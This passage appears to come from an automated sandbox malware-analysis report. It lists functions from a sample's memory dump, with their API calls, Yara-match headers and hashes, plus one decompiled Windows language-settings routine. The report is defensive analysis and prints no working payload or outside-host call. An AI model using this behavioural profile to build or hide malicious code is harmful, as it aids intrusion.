                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        • Opcode ID: 77c983a3e495c44a455abf50a0ebaeb9a74a54e71f915df17b796f4fa7dceb1a
                                                                                                                                                        • Instruction ID: 0a311256fcab31da76bd81a845c772d8a8cd3f86f35e3cc3acd7fc9592859556
                                                                                                                                                        • Opcode Fuzzy Hash: 77c983a3e495c44a455abf50a0ebaeb9a74a54e71f915df17b796f4fa7dceb1a
                                                                                                                                                        • Instruction Fuzzy Hash: 11E09AB5200200AFDB14EF94CC88EE733A8EF88350F008589FD589B282CA30EC10CBB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000984D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                        • Instruction ID: 1c755d4cbfb66d039e8ff558d84dc61b7497881273cc45cb809a5fb29154940b
                                                                                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                        • Instruction Fuzzy Hash: 4AE01AB12002046BDB14DF59CC45EA777ACAF88750F018554F90857242CA30E910CAF0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                        • Instruction ID: 5aa3b97d6aa85e08f00fefe8b5f0a767f3611af8853c18f5fb742d2c041b7cc6
                                                                                                                                                        • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                        • Instruction Fuzzy Hash: B001D631A8022C77EB20B7949C43FFE776CAB40B50F150119FF44BA1C2E694AA0687F6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00087235, Relevance: 3.0, APIs: 2, Instructions: 49threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 3f65712f562beb7d6df8d50ea8a545956ed6206f633df10fed619bb3e82c9d25
                                                                                                                                                        • Instruction ID: 6447cf4499df1ec5d1226e92873e6fe179b708fa040e571e7f30dad799c21eb4
                                                                                                                                                        • Opcode Fuzzy Hash: 3f65712f562beb7d6df8d50ea8a545956ed6206f633df10fed619bb3e82c9d25
                                                                                                                                                        • Instruction Fuzzy Hash: D0F08B32E8011436EA3075A42C43FFA378CAB40B21F19002AFF48EA1C2EA81AD0197E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00089B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction ID: 9dad75656dc95706c574d85ceed14ede952760ce02333afafa4db01abbe2434c
                                                                                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction Fuzzy Hash: 10011EB5E0020DBBDF10EAE4ED42FEDB7B8AB54308F0441A5A90897242F631EB14DB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00098540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098594
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                        • Instruction ID: 501684698dff5584f9e1b6135d593b1e47e90fb512b1126792af57a654e4258c
                                                                                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                        • Instruction Fuzzy Hash: 1701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00097003, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                        • Opcode ID: 2bc52403362204f6eeefa580f73d39c98050df3ba8f89056dae927ff457b99d3
                                                                                                                                                        • Instruction ID: bbc0920e341b285020dbc6c0e1c2ba409c841f88e27bb142704dfce67ee87624
                                                                                                                                                        • Opcode Fuzzy Hash: 2bc52403362204f6eeefa580f73d39c98050df3ba8f89056dae927ff457b99d3
                                                                                                                                                        • Instruction Fuzzy Hash: E1F0E5367902403ADB3066788C03FEB77A8CB91B10F24026DF68AAB2C3D591B8074694
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00097010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                        • Opcode ID: 5219bfafc38eaaf509297b07bc77ea91853afb01027e5a3efff2efc41b452a83
                                                                                                                                                        • Instruction ID: 1c57575cd1b342ca4bfe210f5efd7d7d0c8b495754504b4e5bb7cc1bbad82976
                                                                                                                                                        • Opcode Fuzzy Hash: 5219bfafc38eaaf509297b07bc77ea91853afb01027e5a3efff2efc41b452a83
                                                                                                                                                        • Instruction Fuzzy Hash: D1E06D333902043AE63065A99C02FE7B39C8BC1B20F540026FA4DEB2C2D595F80256A4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00098490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00093516,?,00093C8F,00093C8F,?,00093516,?,?,?,?,?,00000000,00000000,?), ref: 000984BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                        • Instruction ID: cac02a83fd5abd7d49bcf9a62a744273dfce44e83f10bb29bcbd2eb272a030b7
                                                                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                        • Instruction Fuzzy Hash: 1AE012B1200208ABDB14EF99CC41EA777ACAF88650F118558FA089B282CA30F910CBF0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00098630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                        • Instruction ID: 6a27dad26c2d5faf9d449469d3e8af6ec1307e237583b6fb8baac24e736a657b
                                                                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                        • Instruction Fuzzy Hash: 37E01AB12002086BDB10DF49CC85EE737ADAF89650F018554FA0857242C930E8108BF5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0008D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D43B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                        • Instruction ID: 746999c3a9da8dd47fd5d6713711b0bf696e9ec5616cd02b68266e171eb19b41
                                                                                                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                        • Instruction Fuzzy Hash: 88D0A7717503043BEA10FBA89C03F6633CC6B54B00F494064F949D73C3D960F9004561
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 02368788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E02368788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02368460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0234E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0236718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02368460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0236718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02368460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02368460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02368460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0236718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02342340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0235E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0234E2A8(_t322,  &_v68, _v16);
								if(E02365553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0235E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0234E2A8(_t322,  &_v68, _t236);
								if(E02365553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0236718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02342340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0235E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0234E2A8(_v12,  &_v68, _v16);
							if(E02365553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0235E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0234E2A8(_t322,  &_v68, _t269);
							if(E02365553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0236718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0234E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02342340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0235E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0234E2A8(_v12,  &_v68, _v16);
						if(E02365553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0235E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0234E2A8(_t322,  &_v68, _t296);
						if(E02365553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0234E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                        0x02368788
                                                                                                                                                        0x02368788
                                                                                                                                                        0x02368791
                                                                                                                                                        0x02368794
                                                                                                                                                        0x02368798
                                                                                                                                                        0x0236879b
                                                                                                                                                        0x0236879e
                                                                                                                                                        0x023687a1
                                                                                                                                                        0x023687a4
                                                                                                                                                        0x023687a7
                                                                                                                                                        0x023687aa
                                                                                                                                                        0x023687af
                                                                                                                                                        0x023b1ad3
                                                                                                                                                        0x02368b0a
                                                                                                                                                        0x02368b0d
                                                                                                                                                        0x02368b13
                                                                                                                                                        0x02368b19
                                                                                                                                                        0x02368b1f
                                                                                                                                                        0x02368b25
                                                                                                                                                        0x02368b2b
                                                                                                                                                        0x02368b31
                                                                                                                                                        0x02368b37
                                                                                                                                                        0x02368b3d
                                                                                                                                                        0x02368b46
                                                                                                                                                        0x02368b46
                                                                                                                                                        0x023687c6
                                                                                                                                                        0x023687d0
                                                                                                                                                        0x023b1ae0
                                                                                                                                                        0x023b1ae6
                                                                                                                                                        0x023b1af8
                                                                                                                                                        0x023b1af8
                                                                                                                                                        0x023b1afd
                                                                                                                                                        0x023b1afe
                                                                                                                                                        0x023b1b01
                                                                                                                                                        0x023b1b06
                                                                                                                                                        0x023b1b06
                                                                                                                                                        0x023687d6
                                                                                                                                                        0x023687f2
                                                                                                                                                        0x023687f7
                                                                                                                                                        0x02368807
                                                                                                                                                        0x0236880a
                                                                                                                                                        0x0236880f
                                                                                                                                                        0x02368810
                                                                                                                                                        0x02368813
                                                                                                                                                        0x02368818
                                                                                                                                                        0x02368818
                                                                                                                                                        0x0236882c
                                                                                                                                                        0x02368831
                                                                                                                                                        0x02368838
                                                                                                                                                        0x02368908
                                                                                                                                                        0x02368920
                                                                                                                                                        0x023689f0
                                                                                                                                                        0x02368a08
                                                                                                                                                        0x02368af6
                                                                                                                                                        0x02368af6
                                                                                                                                                        0x02368af8
                                                                                                                                                        0x02368afb
                                                                                                                                                        0x023b1beb
                                                                                                                                                        0x023b1beb
                                                                                                                                                        0x02368b04
                                                                                                                                                        0x023b1bf8
                                                                                                                                                        0x023b1c0e
                                                                                                                                                        0x023b1c13
                                                                                                                                                        0x023b1c16
                                                                                                                                                        0x023b1c16
                                                                                                                                                        0x023b1bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368b04
                                                                                                                                                        0x02368a0e
                                                                                                                                                        0x02368a11
                                                                                                                                                        0x02368a14
                                                                                                                                                        0x02368a15
                                                                                                                                                        0x02368a18
                                                                                                                                                        0x02368a22
                                                                                                                                                        0x02368b59
                                                                                                                                                        0x02368a28
                                                                                                                                                        0x02368a3c
                                                                                                                                                        0x02368a3c
                                                                                                                                                        0x02368a42
                                                                                                                                                        0x023b1bb0
                                                                                                                                                        0x023b1b11
                                                                                                                                                        0x023b1b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368a48
                                                                                                                                                        0x02368a51
                                                                                                                                                        0x02368a5b
                                                                                                                                                        0x02368a5e
                                                                                                                                                        0x02368a61
                                                                                                                                                        0x02368a69
                                                                                                                                                        0x02368a69
                                                                                                                                                        0x02368a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368a74
                                                                                                                                                        0x02368a7c
                                                                                                                                                        0x02368a7d
                                                                                                                                                        0x02368a91
                                                                                                                                                        0x02368a93
                                                                                                                                                        0x02368a93
                                                                                                                                                        0x02368a98
                                                                                                                                                        0x02368a9b
                                                                                                                                                        0x02368aa1
                                                                                                                                                        0x02368aa1
                                                                                                                                                        0x02368aa4
                                                                                                                                                        0x02368aaa
                                                                                                                                                        0x02368ab1
                                                                                                                                                        0x02368ac5
                                                                                                                                                        0x02368ac7
                                                                                                                                                        0x02368ac7
                                                                                                                                                        0x02368ac5
                                                                                                                                                        0x02368ace
                                                                                                                                                        0x023b1bc9
                                                                                                                                                        0x023b1bce
                                                                                                                                                        0x023b1bd2
                                                                                                                                                        0x023b1bd2
                                                                                                                                                        0x02368ad8
                                                                                                                                                        0x02368aeb
                                                                                                                                                        0x02368aeb
                                                                                                                                                        0x02368af0
                                                                                                                                                        0x02368af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368af4
                                                                                                                                                        0x02368a42
                                                                                                                                                        0x02368926
                                                                                                                                                        0x02368929
                                                                                                                                                        0x0236892c
                                                                                                                                                        0x0236892d
                                                                                                                                                        0x02368930
                                                                                                                                                        0x02368935
                                                                                                                                                        0x0236893a
                                                                                                                                                        0x02368b51
                                                                                                                                                        0x02368940
                                                                                                                                                        0x02368954
                                                                                                                                                        0x02368954
                                                                                                                                                        0x0236895a
                                                                                                                                                        0x023b1b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368960
                                                                                                                                                        0x02368969
                                                                                                                                                        0x02368973
                                                                                                                                                        0x02368976
                                                                                                                                                        0x02368979
                                                                                                                                                        0x0236897e
                                                                                                                                                        0x02368981
                                                                                                                                                        0x02368981
                                                                                                                                                        0x02368986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023b1b6e
                                                                                                                                                        0x023b1b74
                                                                                                                                                        0x023b1b7b
                                                                                                                                                        0x023b1b8f
                                                                                                                                                        0x023b1b91
                                                                                                                                                        0x023b1b91
                                                                                                                                                        0x023b1b99
                                                                                                                                                        0x023b1b9c
                                                                                                                                                        0x023b1ba2
                                                                                                                                                        0x023b1ba2
                                                                                                                                                        0x0236898c
                                                                                                                                                        0x02368992
                                                                                                                                                        0x02368999
                                                                                                                                                        0x023689ad
                                                                                                                                                        0x023b1ba8
                                                                                                                                                        0x023b1ba8
                                                                                                                                                        0x023689ad
                                                                                                                                                        0x023689b6
                                                                                                                                                        0x023689c8
                                                                                                                                                        0x023689cd
                                                                                                                                                        0x023689d0
                                                                                                                                                        0x023689d0
                                                                                                                                                        0x023689d6
                                                                                                                                                        0x023689e8
                                                                                                                                                        0x023689e8
                                                                                                                                                        0x023689ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023689ed
                                                                                                                                                        0x0236895a
                                                                                                                                                        0x0236883e
                                                                                                                                                        0x02368841
                                                                                                                                                        0x02368844
                                                                                                                                                        0x02368845
                                                                                                                                                        0x02368848
                                                                                                                                                        0x0236884d
                                                                                                                                                        0x02368852
                                                                                                                                                        0x02368b49
                                                                                                                                                        0x02368858
                                                                                                                                                        0x0236886c
                                                                                                                                                        0x0236886c
                                                                                                                                                        0x02368872
                                                                                                                                                        0x023b1b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368878
                                                                                                                                                        0x02368881
                                                                                                                                                        0x0236888b
                                                                                                                                                        0x0236888e
                                                                                                                                                        0x02368891
                                                                                                                                                        0x02368896
                                                                                                                                                        0x02368899
                                                                                                                                                        0x02368899
                                                                                                                                                        0x0236889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023b1b21
                                                                                                                                                        0x023b1b27
                                                                                                                                                        0x023b1b2e
                                                                                                                                                        0x023b1b42
                                                                                                                                                        0x023b1b44
                                                                                                                                                        0x023b1b44
                                                                                                                                                        0x023b1b4c
                                                                                                                                                        0x023b1b4f
                                                                                                                                                        0x023b1b55
                                                                                                                                                        0x023b1b55
                                                                                                                                                        0x023688a4
                                                                                                                                                        0x023688aa
                                                                                                                                                        0x023688b1
                                                                                                                                                        0x023688c5
                                                                                                                                                        0x023b1b5b
                                                                                                                                                        0x023b1b5b
                                                                                                                                                        0x023688c5
                                                                                                                                                        0x023688ce
                                                                                                                                                        0x023688e0
                                                                                                                                                        0x023688e5
                                                                                                                                                        0x023688e8
                                                                                                                                                        0x023688e8
                                                                                                                                                        0x023688ee
                                                                                                                                                        0x02368900
                                                                                                                                                        0x02368900
                                                                                                                                                        0x02368905
                                                                                                                                                        0x00000000
